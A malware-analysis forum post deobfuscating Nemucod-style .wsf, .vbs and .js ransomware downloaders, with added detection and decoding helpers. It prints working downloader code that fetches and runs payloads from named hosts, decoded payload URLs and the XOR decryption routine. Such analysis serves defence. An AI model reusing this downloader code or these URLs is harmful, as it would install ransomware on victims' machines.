- May 14, 2016
- 1,597
https://malwaretips.com/threads/1-8-16-13.61883/
(Thanks to @Solarquest (https://malwaretips.com/members/solarquest.25489/) for the "cookies")
I've seen that, inside the zipped archive, there are several scripted downloaders with various obfuscation methods (.vbs, .js, .wsf).
I will use this thread to analyse them and show what they look like once deobfuscated (or not).
(1) The .wsf files
11 annual report -ACAE1246-.wsf
13 annual report -EDAB2336-.wsf
10 07e81be27f.wsf
9 PV1.wsf
I add, from the same sub-wave, a file I received as a target yesterday:
annual report -DFC52512-.wsf
"Dear DardiM,
Please review the attached corrected annual report.
Yours faithfully
Isabel Sutton"
=> reported; this is the result: https://www.hybrid-analysis.com/sam...f309f2add84d337c11ca00c25b0?environmentId=100
These samples are, once deobfuscated, downloaders similar to the one I analysed here:
https://malwaretips.com/threads/war...nt-js-trojandownloader-nemucod-july-28.61796/
So I won't describe the deobfuscated parts again, just talk about some funny parts.
- No need to deobfuscate them (a very bad obfuscation method is used, see below): just by opening them in Notepad we can see some parts that I already described in my previous post (on the fresh sample received in the last wave, July 28):
- Some important clues appear clearly in the "obfuscated file" with a simple "find" (it made me laugh):
=> var random
=> rawprng()
=> var mash = Mash();
=> function uheprng()
- An important part that is not very obfuscated:
=> QVh1 /* c\040 */(25\066); => QVh1(256) => used for the XOR
=> arrays of chars used for the decipher parts (char replacement)
Do you remember those names? I hope so; otherwise go and see the link to the analysis above.
To summarize:
- This family of scripted downloaders downloads, to a path, an obfuscated payload that is not recognised as an executable file.
- The same scripted downloader is also used to decipher/deobfuscate the content of the downloaded payload, turning it into a real executable: a ransomware with a .exe extension.
- Then the scripted downloader runs the payload with a parameter.
The values/names seen above (in red in the original post) are from the new version of this downloader family, which uses a more complicated technique to obtain the value XORed with each content char of the future .exe file: a value returned by the QVh1(256) function. The result replaces the old content char used for the XOR:
var QVh1 = uheprng();
for (var index = 0; index < file_content_temp.length; index++) {
    file_content_temp[index] ^= QVh1(256); // XOR, i.e. file_content_temp[index] = file_content_temp[index] ^ QVh1(256);
}
(QVh1 = uheprng() => QVh1 holds the content of var random)
=> These names should have been hidden by the first obfuscation method, because they are real clues to detect the malware easily => sub-function calls: var mash = Mash(); mash(value), etc.
Trojan-Downloader.JS.Agent.lxw
Clearly similar to :
Trojan-Downloader.JS.Agent.lvk
Script:Generic/Saruth.A!Ieei
Trojan.Script.Heuristic-js.iacgm
JS/Dloader.DRY!tr.dldr
virus.js.gen.80
But with an awful first obfuscation method => very easy to detect by heuristic analysis
(because they let some important strings appear in a simple text editor)
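As an added example (my own code, not the post's or the samples'), here is what "easy to detect by heuristic analysis" looks like in practice: a scanner for the clue strings the post lists, plus the density of the octal escapes of the first obfuscation layer, run over constructed snippets. The indicator names come from the post; the weights and the threshold are mine.

```javascript
"use strict";

// Clue strings taken from the post ("find" hits in the obfuscated .wsf files); the weights are mine.
const INDICATORS = [
  { name: "uheprng PRNG",           re: /function\s+uheprng\s*\(/,         weight: 3 },
  { name: "rawprng() helper",       re: /\brawprng\s*\(\s*\)/,             weight: 3 },
  { name: "Mash() seeding",         re: /var\s+mash\s*=\s*Mash\s*\(\s*\)/, weight: 3 },
  { name: "var random wrapper",     re: /var\s+random\s*=\s*function/,     weight: 1 },
  { name: "eval of patched string", re: /eval\s*\(\s*\w+\.replace\s*\(/,   weight: 2 },
];

// Octal "\ooo" escapes per 100 characters: the first obfuscation layer of the .wsf
// samples sprinkles them through otherwise plain JScript, which normal code never does.
function octalEscapeDensity(src) {
  const hits = (src.match(/\\[0-7]{3}/g) || []).length;
  return src.length === 0 ? 0 : (hits * 100) / src.length;
}

// Returns the matched clues and a score; 4 or more is flagged (threshold is mine).
function scan(src) {
  const hits = INDICATORS.filter(ind => ind.re.test(src));
  const matched = hits.map(ind => ind.name);
  let score = hits.reduce((sum, ind) => sum + ind.weight, 0);
  const density = octalEscapeDensity(src);
  if (density > 2) {
    matched.push("octal escape density " + density.toFixed(1) + " per 100 chars");
    score += 2;
  }
  return { score, matched, suspicious: score >= 4 };
}

// Constructed inputs (not the real samples): a skeleton modelled on the quoted clues,
// the escaped line quoted in the post, and a benign script.
const DOWNLOADER_LIKE = [
  "function uheprng() {",
  "  var mash = Mash();",
  "  function rawprng() { if (++p >= o) p = 0; }",
  "  var random = function(range) { return Math.floor(range * rawprng()); };",
  "}",
  "eval(aDb7.replace('@', 'v'));",
].join("\n");
const WSF_LINE = 'var XIu6 = "l\\145" +\\040"";\\r\\nva\\162 Ec = "oF\\151\\042 + "";\\r\\nvar Ui = \\042SaveT" + "";';
const BENIGN = "var total = 0;\nfor (var i = 0; i < 10; i++) total += i;\nWScript.Echo(total);";

console.log(scan(DOWNLOADER_LIKE), scan(WSF_LINE), scan(BENIGN));
```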
Obfuscation Method used first:
- unescape unicode
=> some chars are replaced by \unicode
An example :
var XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";
=> Unicode Escaping Tools - Online Toolz
copy-paste it into the part:
Converts Unicode Entities to Unicode Text
Unicode Entities
click on convert
result:
var XIu6 = "le" + "";
var Ec = "oFi" + "";
var Ui = "SaveT" + "";
You can't use the tool linked above to decode the whole file, because some other chars will make it fail.
But this gives you an idea of the "poor" method used.
Obfuscation method used after:
- string replacement by var concatenations and function calls
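As an added example (my code, not the post's), a decoder for this escaped layer that does not choke on the rest of the file: it handles the octal \ooo escapes shown above (the post's "\unicode"), \xHH and \uHHHH, and the \r \n shorthands, then applies the sample's own final aDb7.replace('@', 'v') step. The input is the three quoted statements, constructed as they sit inside the single-quoted aDb7 string; the same function also decodes the \u-escaped pieces of part (3).

```javascript
"use strict";

// One regex for every escape form seen in the excerpts: \uHHHH, \xHH, \ooo, and the
// single-letter shorthands. The octal form is what the post calls "\unicode".
const ESCAPE_RE = /\\(u[0-9a-fA-F]{4}|x[0-9a-fA-F]{2}|[0-7]{1,3}|[rnt\\'"])/g;
const SHORT = { r: "\r", n: "\n", t: "\t", "\\": "\\", "'": "'", '"': '"' };

function decodeEscapes(src) {
  return src.replace(ESCAPE_RE, (_, esc) => {
    if (esc[0] === "u" || esc[0] === "x") return String.fromCharCode(parseInt(esc.slice(1), 16));
    if (/^[0-7]/.test(esc)) return String.fromCharCode(parseInt(esc, 8));
    return SHORT[esc];
  });
}

// The sample ends with eval(aDb7.replace('@', 'v')): one '@' stands in for a 'v' and is
// swapped back just before eval (String.replace with a string pattern touches only the
// first match), so the same step is applied here after unescaping.
function revealWsfLayer(escapedSource) {
  return decodeEscapes(escapedSource).replace("@", "v");
}

// Constructed input: the three statements quoted in the post, as they sit inside the
// single-quoted aDb7 string (backslashes are doubled only because this is JS source).
const QUOTED_EXCERPT = 'var XIu6 = "l\\145" +\\040"";\\r\\nva\\162 Ec = "oF\\151\\042 + "";\\r\\nvar Ui = \\042SaveT" + "";';

// Split the decoded text into the statements the post shows as the tool's "result".
function decodedStatements(escapedSource) {
  return revealWsfLayer(escapedSource).split("\r\n");
}

console.log(decodedStatements(QUOTED_EXCERPT));
```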
(2) 2.8.vbs
Obfuscation method used:
Only replacement/concatenation of strings from vars or functions (an example below).
The funniest part: at the end of the file, this part:
...
...
function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla
First conclusion:
=> the important parts are not very well obfuscated...
=> we can see the URL used for the payload.
Without trying to deobfuscate it, it's easy to understand almost all of it:
(Better obfuscation, but an analogous result was seen in a previous analysis:
https://malwaretips.com/threads/1-vbs-sample-downloader-vbswgbased-gen-deobfuscation.61734/
=> spoiler in part (4)
)
- It creates a temp file name and builds the path:
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
(ad syqgu = 2: the Temp folder is used to store temporary files; its path is found in the TMP environment variable)
- opens a connection and sends the request:
fromdime1.Open uniku, "hxxp://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
(uniku = "GET")
- creates an object and opens a stream to save the content received:
Set pwodesen5 = CreateObject(rocu2)
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
("ADODB.Stream" object => see below)
- and uses the same object to save it to a file:
pwodesen5.savetofile pelisak, adsyqgu
- at the end, it runs the payload:
ysezhuxwa unjijbagwe2, pelisak, ozylefla
(function ysezhuxwa (unjijbagwe2, pelisak, ozylefla)
if TypeName(ozylefla.ScriptName) = zapjym then
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if)
Easy to understand what this script does...
I deobfuscated 0 parts to write the part above...
(In green in the original post: information I retrieved afterwards, to be clearer)
An example of a string obtained by several methods:
Set pwodesen5 = CreateObject(rocu2)
rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu
with:
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
(I have rarely seen as easy a method => Array(......)(index_to_use_in_clear))
bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."
function zucebi ()   (returns "St")
function cdanufv ()  (returns "re")
function ibebacu ()  (returns "am")
=> the strings in red in the original post => rocu2 = "adodb.stream"
=> Set pwodesen5 = CreateObject("adodb.stream")
I stop here for the very easy obfuscation methods used.
Next part will be with a sample that uses a more elaborate obfuscation method, from the same Malware Vault pack.
(3) "4 6183943701_01-08-2016.js" (same method as "7 9329606101_01-08-2016.wsf"):
When first opening this file, the obfuscation method looks interesting.
In the spoiler, only a few parts, to give you an idea.
Deobfuscation:
1)
First thing to do: delete all the "votgorodazaspinoyiputkoroheCCC" and "votgorodazaspinoyiputkorohe" parts:
2)
Look at the end:
try{
Shtyler4("http://"+"\u0068e\u0072i\u006Da\u0073u"+"\u002Ew\u0065b\u002Ef\u00632\u002Ec\u006Fm\u002F0\u0039u\u0039j\u006E8\u0037" + "?AMLXoFbQSk=KGkINlTdQz","JlLQdKnWwif");
}catch(votgorodazaspinoyiputkoroheuUxUroNK){}
try{
Shtyler4("http://"+"\u00312\u0035r\u0075"+".\u0077e\u0062.\u0066c\u0032.\u0063o\u006D/\u00309\u00759\u006An\u00387" + "?yMsjsVxGF=efxMvO","bsMnCcz");
}catch(votgorodazaspinoyiputkoroheSaqWtHkKPQ){}
try{
Shtyler4("http://"+"\u0068r\u0065n\u006Ee\u0072"+".\u0067m\u0078h\u006Fm\u0065.\u0064e\u002F0\u0039u\u0039j\u006E8\u0037" + "?xBpCVMC=cLVucBgsR","FgGsqpxH");
}catch(votgorodazaspinoyiputkoroheIqjwksMIt){}
- Using the tool I linked in part (1) :
http://"+"herimasu"+".web.fc2.com/09u9jn87" + "?AMLXoFbQSk=KGkINlTdQz"
http://"+"125ru"+".web.fc2.com/09u9jn87" + "?yMsjsVxGF=efxMvO
http://"+"hrenner"+".gmxhome.de/09u9jn87" + "?xBpCVMC=cLVucBgsR"
My first question when I saw this part: "Why did they leave the URLs so easy to retrieve?!"
My second question was: "Are these the real URLs used to download the payloads?!"
The first and third URLs are blocked by KTS cloud.
The second exists no more: 403.
Because the very interesting part is the deobfuscation from their "chaotic" source, it made me curious and made me want to deobfuscate it completely (to see the real parts used, etc.).
3)
Let's investigate more
var sirdallos ="RAPAPIPATARXhwYW5RAPAPIPATAkRW52aXRAPAPIPATAJvbm1lbnRTdHJRAPAPIPATApbmdz".manysecretthings();
A lot of strange strings use the same function: manysecretthings();
=> lol, a very explicit name they gave it
The most important string used this way is 8492 chars long.
manysecretthings() uses char code BITWISE operations: AND, OR, SHR, SHL
and also uses an array to retrieve the right char code from the calculated values: lulalula
Let's test:
var VARDOCF ="JVRFTVAl".manysecretthings();
=> "%TEMP%"
var finde = "QWN0aXZlWE9iamVjdARAPAPIPATA=RAPAPIPATA=RAPAPIPATA".manysecretthings();
=> "ActiveXObject"
Spoiler from part (1): the XOR loop of the new version, followed by the PRNG code found in the sample (the names in red in the original post):
var QVh1 = uheprng();
for (var index = 0; index < file_content_temp.length; index++) {
    file_content_temp[index] ^= QVh1(256); // XOR, i.e. file_content_temp[index] = file_content_temp[index] ^ QVh1(256);
}
(QVh1 = uheprng() => QVh1 holds the content of var random)
=> These names should have been hidden by the first obfuscation method, because they are real clues to detect the malware easily => sub-function calls: var mash = Mash(); mash(value), etc.
Content of var random:
var random = function(range) {
    return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
}
The full PRNG code (the forum rendering had it partly duplicated and collapsed; the index in s[i] = mash(384267) is missing from that rendering, presumably eaten as BBCode, and is restored here):
function uheprng() {
    return (function() {
        var o = 48,
            c = 1,
            p = o,
            s = new Array(o);
        var i, j;
        var base64chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
        var mash = Mash();
        for (i = 1 * 0; i < o; i++) s[i] = mash(384267); // constant seed => the same keystream on every run
        mash = null;
        var random = function(range) {
            return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
        }
        function rawprng() {
            if (++p >= o) p = 0;
            var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
            return s[p] = t - (c = t | 0);
        }
        return random;
    }());
};
function Mash() {
    var n = 0xefc8249d;
    var mash = function(data) {
        if (data) {
            data = data.toString();
            for (var i = -8257 + 8257; i < data.length; i++) { // -8257 + 8257 = 0
                n += data.charCodeAt(i);
                var h = 0.02519603282416938 * n;
                n = h >>> 0;
                h -= n;
                h *= n;
                n = h >>> 0;
                h -= n;
                n += h * 0x100000000;
            }
            return (n >>> 0) * 2.3283064365386963e-10;
        } else
            n = 0xefc8249d;
    };
    return mash;
}
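As an added example (my own code, not the sample's or the post's), this re-implements the keystream cleanly so that a payload captured on the wire can be XORed back into the .exe offline. It assumes, as I read the code quoted above, that the sample fills all 48 slots of s[] with successive mash(384267) values, and it drops the unused reset branch of Mash; the byte array it works on is constructed.

```javascript
"use strict";

// Mash() as quoted above: a stateful hash of the seed text, returning a value in [0, 1).
function Mash() {
  let n = 0xefc8249d;
  return function (data) {
    data = data.toString();
    for (let i = 0; i < data.length; i++) {
      n += data.charCodeAt(i);
      let h = 0.02519603282416938 * n;
      n = h >>> 0;
      h -= n;
      h *= n;
      n = h >>> 0;
      h -= n;
      n += h * 0x100000000;
    }
    return (n >>> 0) * 2.3283064365386963e-10;
  };
}

// uheprng() as quoted above, with the seed as a parameter instead of the hard-coded
// constant. Because mash() keeps state between calls, the 48 slots all differ.
function uheprng(seed) {
  const o = 48;
  let c = 1, p = o;
  const s = new Array(o);
  const mash = Mash();
  for (let i = 0; i < o; i++) s[i] = mash(seed);
  function rawprng() {
    if (++p >= o) p = 0;
    const t = 1768863 * s[p] + c * 2.3283064365386963e-10;
    return s[p] = t - (c = t | 0);
  }
  return function random(range) {
    return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) * 1.1102230246251565e-16));
  };
}

const SAMPLE_SEED = 384267; // the constant the sample feeds to mash()

// First n keystream bytes, i.e. the successive QVh1(256) values of the sample's loop.
function keystream(n, seed = SAMPLE_SEED) {
  const QVh1 = uheprng(seed);
  const out = [];
  for (let i = 0; i < n; i++) out.push(QVh1(256));
  return out;
}

// The XOR loop from part (1) over a byte array. XOR is its own inverse, so the same
// call recovers the executable from the downloaded blob and turns it back again.
function xorWithKeystream(bytes, seed = SAMPLE_SEED) {
  const QVh1 = uheprng(seed);
  const out = new Uint8Array(bytes.length);
  for (let index = 0; index < bytes.length; index++) out[index] = bytes[index] ^ QVh1(256);
  return out;
}

// Constructed demo: a fake "MZ" header round-trips through the keystream.
const FAKE_PE_HEADER = new Uint8Array([0x4d, 0x5a, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00]);
const blob = xorWithKeystream(FAKE_PE_HEADER);
const recovered = xorWithKeystream(blob);
console.log(keystream(8), Array.from(blob), Array.from(recovered));
```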
Spoiler from part (1): the .wsf file as it appears before any deobfuscation (excerpt, first obfuscation method):
<job id="a">
<script language="JScript" id="a">
if (WScript.Path.charAt(WScript.Path.length-1) != "2") WScript.Quit(0);
var aDb7 = 'var\040SNg\065 \075 "ose" +\040"";\r\nvar \122d0 = "cl" +\040"";\r\nvar XIu6 = "l\145" +\040"";\r\nva\162 Ec = "oF\151\042 + "";\r\nvar Ui = \042SaveT" + "";\r\nvar\040LUg \075 "ext" + "";\r\nvar FSi \075 "iteT" + \042";\r\nv\141r Iq2 \075\040"\167r" +\040"";\r\012var MCl\060\040= "\157p\145n" \053 "";\r\nvar COz = "t" + "";\r\nvar So2 = "rs\145" + "";\r\012var Bk = "C\150a" + ""\073\r\012var\040Pn0\040= "pe" + "";\r\nva\162\040L\154\040= "\164y" + "";\r\n\166ar Yo6\040=\040"m\042 \053 ""\073\r\012var AK\164 = "ea\042 +\040"\042;\r\nvar Fr0 = "tr" + "";\r\n\166ar NYf\065 = \042DB.S" + "";\r\nvar ISh9 = \042O" \053\040"";\r\nv\141r UFg =\040"D" + \042"\073\r\nva\162 YBj = "A" + "";\015\012\166ar \110j\061 = "ect"\040+ "";\r\nvar Ak1 = "eObj\042\040+\040"";\r\nvar\040Qh6 = "eat" + "";\r\nvar Rp9 = \042C\162" + ""\073\r\012functi\157n \124V\145(EIq0)\173re\164urn EIq0;};var N\122\157 = "in" +\040""\073\r\nv\141r Qr9\040= "jo" \053 "";\r\012var YKt = "C\157de\042 + "";\r\nvar Mj9\040= "har" + "\042\073\r\012var QRt = "\146romC" + ""\073\r\nvar Fo9 =\040"h\042 + \042"\073\r\nvar NSj = "l\145n\147t" + "";\r\nvar \132K\161 = \042h" + "";\015\nvar Vy = "pus" + "";\015\nvar \112Rx9 = "t" + "";\r\nvar \115p = "od\145A" + "\042;\r\nvar Ip = "c\150a\162C" + "";\r\nvar\040QRw =\040"h" + \042";\015\012\166a\162 Ul =\040\042\154engt" + "";\015\nvar Vj0\040= "close"
....
....
KJp\133TWg0]();\r\012};';
eval(aDb7.replace('@', 'v'));
WScript.Quit(1);
</script>
</job>
Spoiler from part (2): 2.8.vbs as it appears in the archive (excerpt):
Dim gqawtaci
Dim lelruwu7, vlopazo9, dasgilcur9, kiwilve, rocu2, gquhynk4, rmahbezc, ibefo, ijlagle, karyccoq, tefcy2
Dim wyfpi2, ofebw9, qhopkuqfa, imonqy2, aqiv4, iphewb, bubhumug8, zapjym, fifgimtud7
Dim nisyc
Dim avduwra
Dim cuwosamv, znawmuji0, hsinugzy6, gizwul1, uniku, nkemyfog3, efhawu, lexxanwy1
kiwilve = Array ("asn", "ze", "Sc", "ufluv", "uhd", "lwyzl")(2)
ibefo = "WS"
function yqegnokve ()
...
...
End function
vlopazo9 = "el"
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
function nwaqzupe ()
Dim ecowsupo
ecowsupo = "Sy"
nwaqzupe = ecowsupo
End function
function exjat ()
Dim cihojy
cihojy = Array ("LH", "npib", "ipo", "facl", "ese", "xu")(0)
exjat = cihojy
End function
function ymqunygf ()
Dim ixuje
ixuje = "ri"
ymqunygf = ixuje
End function
function vaxivwu ()
Dim yjytt
yjytt = Array ("oje", "hu", "kdeja", "uri", "ip", "efva")(4)
...
lelruwu7 = "Ob"
znawmuji0 = "ex"
efhawu = Array ("Fi", "upe", "dare", "invu", "meff", "uzujq", "uqky", "pa")(0)
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
dasgilcur9 = "b."
tefcy2 = "/c"
function kqufiwbe ()
Dim htywcix
htywcix = Array ("yvah", "oci", "bci", "hxy", "psoqpo", "cbicy", " ", "lyqx")(6)
kqufiwbe = htywcix
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ocgusix ()
Dim zfevydu
zfevydu = "of"
ocgusix = zfevydu
End function
nkemyfog3 = Array ("fxofu", "so", "cr", "ly", "gdi", "uwe", "hri")(2)
cuwosamv = "ng"
lexxanwy1 = Array ("usit", "ujpaz", "kmaz", "aqus", "em", "xax", "no")(4)
karyccoq = "in"
function ugqufqor ()
Dim ecbabruri
ecbabruri = "l"
ugqufqor = ecbabruri
End function
...
...
End function
ijlagle = Array ("vgev", "yriv", "hsexvy", "izto", "wbokm", "ywuvz", "le")(6)
function alwub ()
Dim ciherw
ciherw = Array ("ur", "hxymmo", "dwadm", "udg", "iqber", "oxa", "e ")(6)
alwub = ciherw
End function
function edunahi ()
Dim oxtivvy
oxtivvy = Array ("cwe", "gworne", "Mi", "zuf", "ucik", "ygduv", "itx", "ydp")(2)
edunahi = oxtivvy
End function
function fboxpopku ()
Dim pxapzo
pxapzo = "st"
fboxpopku = pxapzo
End function
function inut ()
Dim xysote
xysote = Array ("je", "tvyth", "uxu", "atu", "osbefh", "bo")(0)
inut = xysote
End function
wyfpi2 = Array ("oba", "t.", "debu", "xwo", "txafy", "icv")(1)
function ypirysy ()
Dim mankiga
mankiga = Array ("wi", "orqu", "op", "P", "yxf", "okovs", "otse")(3)
ypirysy = mankiga
End function
...
....
unjijbagwe2.run hsinugzy6 & pelisak, nisyc
end if
End function
Dim pelisak
Dim ozsupxisjo
Set ozylefla = WScript
Set fromdime1 = CreateObject(gizwul1)
Set ovoraztu4 = CreateObject(fifgimtud7)
Set zcobzulf8 = ovoraztu4.GetSpecialFolder( adsyqgu )
Set pwodesen5 = CreateObject(rocu2)
Set unjijbagwe2 = CreateObject(iphewb)
ozsupxisjo = ovoraztu4.GetTempName()
pelisak = zcobzulf8 & "\" & ozsupxisjo
fromdime1.Open uniku, "http://newdoolpaak.xyz/admin.php?f=1.gif", False
fromdime1.Send
pwodesen5.Type = hyztomy
pwodesen5.Open
pwodesen5.write fromdime1.responseBody
pwodesen5.savetofile pelisak, adsyqgu
ysezhuxwa unjijbagwe2, pelisak, ozylefla
Spoiler from part (2): the same rocu2 example with the three functions in full:
Set pwodesen5 = CreateObject(rocu2)
rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu
with:
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
(I have rarely seen as easy a method => Array(......)(index_to_use_in_clear))
bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."
function zucebi ()
Dim efjipxu
efjipxu = "St"
zucebi = efjipxu
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
=> the strings in red in the original post => rocu2 = "adodb.stream"
=> Set pwodesen5 = CreateObject("adodb.stream")
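As an added example (my code, not the post's or the sample's), a small static resolver for exactly this pattern: it parses the quoted lines (embedded below as a constructed snippet), folds the Array(...)(index) picks, the literals and the one-line getter functions, and reports what each CreateObject(...) argument resolves to. It yields "Adodb.Stream", which CreateObject treats the same as the "adodb.stream" above.

```javascript
"use strict";

// Constructed from the lines quoted in the post (the three getter functions in full).
const VBS_SAMPLE = `
rmahbezc = Array ("ke", "Ad", "cat", "ygysb", "awby", "adpa")(1)
bubhumug8 = Array ("ysbu", "epfo", "ozq", "qne", "od", "ydox")(4)
dasgilcur9 = "b."
function zucebi ()
Dim efjipxu
efjipxu = "St"
zucebi = efjipxu
End function
function cdanufv ()
Dim bycutusq
bycutusq = Array ("ote", "ekkalm", "uqc", "re", "cho", "sa", "zxyp")(3)
cdanufv = bycutusq
End function
function ibebacu ()
Dim fibytekj
fibytekj = Array ("am", "vxu", "iwnifx", "ywcuvl", "wo", "co", "lqo")(0)
ibebacu = fibytekj
End function
rocu2 = rmahbezc & bubhumug8 & dasgilcur9 & zucebi & cdanufv & ibebacu
Set pwodesen5 = CreateObject(rocu2)
`;

const has = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);

// Split the script into top-level assignments and per-function assignment lists.
function parseVbs(src) {
  const globals = [];                         // [lhs, rhsExpr] in source order
  const functions = Object.create(null);      // name -> [[lhs, rhsExpr], ...]
  let current = null;
  for (const raw of src.split(/\r?\n/)) {
    const line = raw.trim();
    let m;
    if (!line || /^(Dim|Set)\b/i.test(line)) continue;
    if ((m = /^function\s+(\w+)\s*\(\s*\)$/i.exec(line))) { current = functions[m[1]] = []; continue; }
    if (/^End\s+function$/i.test(line)) { current = null; continue; }
    if ((m = /^(\w+)\s*=\s*(.+)$/.exec(line))) (current || globals).push([m[1], m[2]]);
  }
  return { globals, functions };
}

// Evaluate an "&"-joined expression: "literal", Array (...)(index), or an identifier.
// Assumes no "&" inside string literals, which holds for the quoted lines.
function evalExpr(expr, lookup) {
  return expr.split("&").map(term => {
    const t = term.trim();
    let m;
    if ((m = /^"([^"]*)"$/.exec(t))) return m[1];
    if ((m = /^Array\s*\((.*)\)\s*\((\d+)\)$/i.exec(t))) {
      const items = [...m[1].matchAll(/"([^"]*)"/g)].map(x => x[1]);
      return items[Number(m[2])];
    }
    return lookup(t);
  }).join("");
}

// Resolve one variable: globals run in order; an identifier that is not a variable
// falls back to calling a getter function, whose result is what it assigned to its own name.
function resolveVar(name, parsed) {
  const env = Object.create(null);
  const lookup = scope => id => {
    if (has(scope, id)) return scope[id];
    if (has(env, id)) return env[id];
    if (has(parsed.functions, id)) return callFn(id);
    throw new Error("unresolved identifier: " + id);
  };
  function callFn(fn) {
    const local = Object.create(null);
    for (const [lhs, rhs] of parsed.functions[fn]) local[lhs] = evalExpr(rhs, lookup(local));
    return local[fn];
  }
  for (const [lhs, rhs] of parsed.globals) {
    try { env[lhs] = evalExpr(rhs, lookup(Object.create(null))); }
    catch (e) { /* a construct this resolver does not model; leave it unresolved */ }
  }
  return env[name];
}

// Every CreateObject(...) call with its argument resolved to the ProgID it names.
function resolveCreateObjects(src) {
  const parsed = parseVbs(src);
  return [...src.matchAll(/CreateObject\s*\(\s*(\w+)\s*\)/gi)].map(m => resolveVar(m[1], parsed));
}

console.log(resolveCreateObjects(VBS_SAMPLE)); // [ 'Adodb.Stream' ]
```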
Spoiler from part (3): excerpts of "4 6183943701_01-08-2016.js" (same method as "7 9329606101_01-08-2016.wsf") before any deobfuscation:
votgorodazaspinoyiputkoroheCCCrodmands.create = function(){
var votgorodazaspinoyiputkoroheCCCpublisher = new votgorodazaspinoyiputkoroheCCCMBJSL.votgorodazaspinoyiputkoroheCCCPublisher();
var votgorodazaspinoyiputkoroheCCCspyFunction1 = votgorodazaspinoyiputkoroheCCCsinon.votgorodazaspinoyiputkoroheCCCspy();
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCsubscribe(votgorodazaspinoyiputkoroheCCCspyFunction1, this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(), "Function called without arguments");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, "PROPER1");
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith("PROPER1"), "Function called with 'PROPER1' argument");
votgorodazaspinoyiputkoroheCCCpublisher.votgorodazaspinoyiputkoroheCCCpublish(this.votgorodazaspinoyiputkoroheCCCtype1, ["PROPER1", "PROPER2"]);
votgorodazaspinoyiputkoroheCCCok(votgorodazaspinoyiputkoroheCCCspyFunction1.votgorodazaspinoyiputkoroheCCCcalledWith(["PROPER1", "PROPER2"]), "Function called with 'PROPER1' and 'PROPER2' arguments");
};
votgorodazaspinoyiputkoroheCCCrodmands.votgorodazaspinoyiputkoroheCCCsubtract = function(votgorodazaspinoyiputkoroheCCCparam1, votgorodazaspinoyiputkoroheCCCparam2) {
return new votgorodazaspinoyiputkoroheCCCrodmands(votgorodazaspinoyiputkoroheCCCparam1.x - votgorodazaspinoyiputkoroheCCCparam2.x, votgorodazaspinoyiputkoroheCCCparam1.y - votgorodazaspinoyiputkoroheCCCparam2.y);
};
var votgorodazaspinoyiputkoroheCCCqtcnthltqfqrhfq = { ':': '.','U': 'S','PIPIPKA': 'X', '00':'', '11':'', '22':''};
var votgorodazaspinoyiputkoroheCCCerrant = 0;
function votgorodazaspinoyiputkoroheCCCachievment(votgorodazaspinoyiputkoroheCCCbidttt){
if(votgorodazaspinoyiputkoroheCCCbidttt==1){return 2;}
else{return 17;}
return 3;};
